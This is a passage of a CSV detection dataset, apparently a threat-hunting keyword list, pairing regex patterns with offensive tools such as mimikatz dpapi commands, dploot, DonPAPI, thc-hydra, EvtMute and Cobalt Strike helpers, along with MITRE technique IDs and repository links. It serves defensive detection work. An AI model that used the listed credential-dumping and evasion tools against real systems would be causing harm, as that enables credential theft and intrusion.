keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::create*",".{0,1000}dpapi\:\:create.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cred*",".{0,1000}dpapi\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::credhist*",".{0,1000}dpapi\:\:credhist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::luna*",".{0,1000}dpapi\:\:luna.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::masterkey*",".{0,1000}dpapi\:\:masterkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::protect*",".{0,1000}dpapi\:\:protect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::ps*",".{0,1000}dpapi\:\:ps.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::rdg*",".{0,1000}dpapi\:\:rdg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::sccm*",".{0,1000}dpapi\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::ssh*",".{0,1000}dpapi\:\:ssh.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::tpm*",".{0,1000}dpapi\:\:tpm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::vault*",".{0,1000}dpapi\:\:vault.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::wifi*",".{0,1000}dpapi\:\:wifi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::wwman*",".{0,1000}dpapi\:\:wwman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi_dump*",".{0,1000}dpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*dpapi_dump_*.txt*",".{0,1000}dpapi_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*dpapi_pick/credhist.py*",".{0,1000}dpapi_pick\/credhist\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*DPAPImk2john.py*",".{0,1000}DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*dpl4hydra *",".{0,1000}dpl4hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra.sh*",".{0,1000}dpl4hydra\.sh.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_*.csv*",".{0,1000}dpl4hydra_.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_*.tmp*",".{0,1000}dpl4hydra_.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dpl4hydra_linksys*",".{0,1000}dpl4hydra_linksys.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*dploot 
-*",".{0,1000}dploot\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot sccm -d*",".{0,1000}dploot\ssccm\s\-d.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*backupkey*",".{0,1000}dploot.{0,1000}backupkey.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*browser*",".{0,1000}dploot.{0,1000}browser.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*certificates*",".{0,1000}dploot.{0,1000}certificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*credentials*",".{0,1000}dploot.{0,1000}credentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential 
Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinecertificates*",".{0,1000}dploot.{0,1000}machinecertificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinecredentials*",".{0,1000}dploot.{0,1000}machinecredentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinemasterkeys*",".{0,1000}dploot.{0,1000}machinemasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*machinevaults*",".{0,1000}dploot.{0,1000}machinevaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*masterkeys*",".{0,1000}dploot.{0,1000}masterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*vaults*",".{0,1000}dploot.{0,1000}vaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI 
looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot*wifi*",".{0,1000}dploot.{0,1000}wifi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.lib.dpapi*",".{0,1000}dploot\.lib\.dpapi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.lib.smb*",".{0,1000}dploot\.lib\.smb.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.triage.*",".{0,1000}dploot\.triage\..{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot.triage.sccm import SCCMTriage*",".{0,1000}dploot\.triage\.sccm\simport\sSCCMTriage.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" 
"*dploot/releases/download/*/dploot*",".{0,1000}dploot\/releases\/download\/.{0,1000}\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot_linux_adm64*",".{0,1000}dploot_linux_adm64.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*dploot-main.zip*",".{0,1000}dploot\-main\.zip.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI*",".{0,1000}DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*dr0op/CrossNet*",".{0,1000}dr0op\/CrossNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Dr0p1t-Framework*",".{0,1000}Dr0p1t\-Framework.{0,1000}","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? 
In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","10","1364","373","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z" "*dr4k0nia/NixImports*",".{0,1000}dr4k0nia\/NixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*DragonCastle - @TheXC3LL*",".{0,1000}DragonCastle\s\-\s\@TheXC3LL.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*DragonCastle.dll*",".{0,1000}DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*dragoncastle.py -*",".{0,1000}dragoncastle\.py\s\-.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*DReverseProxy.git*",".{0,1000}DReverseProxy\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*DReverseServer.go*",".{0,1000}DReverseServer\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 